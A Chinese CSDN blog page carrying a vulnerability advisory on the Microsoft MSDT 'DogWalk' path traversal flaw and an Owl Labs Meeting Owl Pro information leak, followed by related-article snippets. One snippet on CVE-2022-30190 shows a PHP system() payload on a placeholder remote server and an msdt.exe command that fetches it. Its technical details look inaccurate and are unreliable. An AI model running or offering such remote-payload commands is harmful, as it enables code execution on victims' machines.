漏洞通告 | Microsoft MSDT 路径便利漏洞;Owl labs Meeting Owl Pro信息泄露漏洞

最新推荐文章于 2024-01-24 22:19:57 发布
最新推荐文章于 2024-01-24 22:19:57 发布
阅读量464 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zz_tech/article/details/125303020
本文详细介绍了Microsoft MSDT路径遍历漏洞(DogWalk),该漏洞可能导致恶意可执行文件在Windows启动文件夹中自动执行。0patch提供了非官方微补丁。此外,还讨论了Owl Labs Meeting Owl Pro的信息泄露漏洞(CVE-2022-31460),包括其他四个高风险安全漏洞,受影响用户应升级到5.4.1.4版本进行修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【Microsoft MSDT路径便利漏洞】

漏洞详情

MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一种实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。

2020年1月,研究人员公开了微软诊断工具中的一个路径遍历0 day漏洞(被称为”DogWalk“),该漏洞位于 Microsoft 诊断工具的sdiageng.dll库中。当目标用户打开恶意制作的 .diagcab 文件(通过电子邮件接收或从Web下载)时,可以利用该漏洞将恶意可执行文件保存到 Windows 启动文件夹,该可执行文件将在下次重新启动 Windows 时自动执行。

影响范围

此漏洞影响大部分 Windows 版本(从Windows 7 、Server 2008到Windows 11 、Server 2022)

2022年6月7日,0patch 微补丁服务为大多数受影响的 Windows 版本发布了免费的非官方补丁,但要下载此补丁,用户需要注册0patch帐户并安装0patch agent。该微补丁适用于以下Windows版本:

安全建议

2022年6月7日,0patch 微补丁服务为大多数受影响的 Windows 版本发布了免费的非官方补丁,但要下载此补丁,用户需要注册0patch帐户并安装0patch agent。该微补丁适用于以下Windows版本:

Windows 11 v21H2

Windows 10 v21H2

Windows 10 v21H1

Windows 10

最低0.47元/天 解锁文章
信息泄露漏洞
jelly
07-27 7450
前言:信息泄露包括的内容很广泛,很多漏洞都可以归为信息泄露类的漏洞,所以这类漏洞需要去细细消化其中的每个技术. 本篇笔记主要参考burp学院的信息泄露相关内容 什么是信息泄露 是指网站无意间向用户泄露敏感信息。根据上下文,网站可能会将各种信息泄漏给潜在的攻击者,包括: 有关其他用户的数据,例如用户名或财务信息 敏感的商业或商业数据 有关网站及其基础架构的技术细节 泄露敏感的用户或业务数据的危险相当明显,但泄露技术信息有时可能同样严重。尽管某些信息用途有限,但它可能是暴露其他攻击面的起点,其中可能包含其他
漏洞通告 | Spring Cloud Function 拒绝服务漏洞;微软6月多个安全漏洞
zz_tech的博客
06-17 1501
Spring Cloud Function 拒绝服务漏洞;微软6月多个安全漏洞
MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)
huayimy的博客
11-23 1474
MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)输入技术支持人员提供的密钥
Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)
weixin_46038704的博客
06-01 803
Microsoft MSDT任意代码执行漏洞(CVE-2022-30190)复现
菜单相关新词
weixin_30847271的博客
05-29 235
populate英 [ˈpɒpjuleɪt] 美 [ˈpɑ:pjuleɪt] vt.居住于;生活于;移民于;落户于 accelerator英 [əkˈseləreɪtə(r)] 美 [ækˈsɛləˌretɚ] n.加速器;催速剂 OLE Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE 不仅是桌面应用程序集...
Kesion cms 路径泄露漏洞
收集盒 Book box
09-09 2952
路径bug 1 : http://www.xx .com/user/editor.asp?ChannelID=10000&ID=Content ---------------------------------------------------------------------------------------------- 暴路径bug 2 : 最近看到一个科汛的cm
CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
aihiglh的博客
06-15 4221
CVE-2022-30190的复现与使用,由一位中学生独自编写(第一次写文章),干货较多,欢迎收藏和讨论交流
服务器路径泄露漏洞
linhl_sdysit的博客
12-17 2158
tornado服务器路径泄露漏洞漏洞一般是由于目标web应用没有处理好应用错误信息导致的。如果攻击者获取到这些信息,可以了解目标服务器目录结构,并通过利用该信息,再配合其它漏洞对目标服务器实施进一步的攻击。 Traceback (most recent call last): File "/usr/local/python27/lib/python2.7/site-packages/tornado/web.py", line 1590, in _execute result = method
漏洞检测:异常页面导致服务器路径泄漏 WASC Threat Classification
xuan2717的博客
08-23 337
漏洞检测:异常页面导致服务器路径泄漏 WASC Threat Classification
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
01-19 1126
临近年关,不知是黑客兄弟们闲来无事,还是各个部门要年总总结,总之是在放假之际,系统漏洞陆续爆出。一言蔽之,总是自己技术不过关考虑不周导致的。所谓攻防,如果知道攻,那么防是简单的;如果对攻不甚了解,那么就无所谓防。
路径遍历
Vinson的博客
10-05 4371
路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为“点-点斜线”、“目录遍历”、“目录...
文件绝对路径泄露
fansenliangren的博客
11-22 4360
在网站系统对用户提交的非法请求回复错误信息,或HTML、JaveScript等源码书写疏忽等情况下,易发生服务器系统某些文件的绝对路径泄露。通过制造报错使应用泄露出应用在主机中的绝对地址路径,攻击者可以通过泄露的绝对路径,分析网站结构,为后续上传恶意后门(如webshell等)创造了条件。
任意文件读取和漏洞复现
weixin_58954236的博客
09-02 6782
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
「 典型安全漏洞系列 」06.路径遍历(Path Traversal)漏洞详解
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-24 6410
路径遍历(Path Traversal)是一种安全漏洞,也被称为目录遍历或目录穿越、文件路径遍历。它发生在应用程序未正确验证用户提供的文件路径时,允许攻击者访问系统上的敏感文件或目录,甚至执行恶意代码。
信息收集思路——漏洞挖掘总结
yuan_boss的博客
08-10 3096
针对不同的SRC要求,厂商可能会给定我们一个资产范围,比如子域名:*yuanboss.com,刚开始我们可以通过给定的域名收集子域名,然后收集目录/端口,为了更进一步,我们就需要找到真实IP,因为子域名都是一些常见的资产,可能找不到漏洞了,这个时候就需要通过IP来查找其他开放服务,进而挖掘漏洞在护网中我们获得信息就是目标名称,比如:xx学校,xx公司,这个时候我们就可以通过这些名字去QCC,天眼查等网站去找对应的公司,然后找到他的官网,接着就是找子域名,信息收集的逻辑就和上面的一样了。
路径遍历(目录遍历)
世间繁华梦一出
04-21 4129
一、简介 路径遍历攻击也成为目录遍历,旨在,访问存储在web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对路径来引用文件的变量,来访问存储在文件系统上的任意文件和目录,包括应用程序源代码 ...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值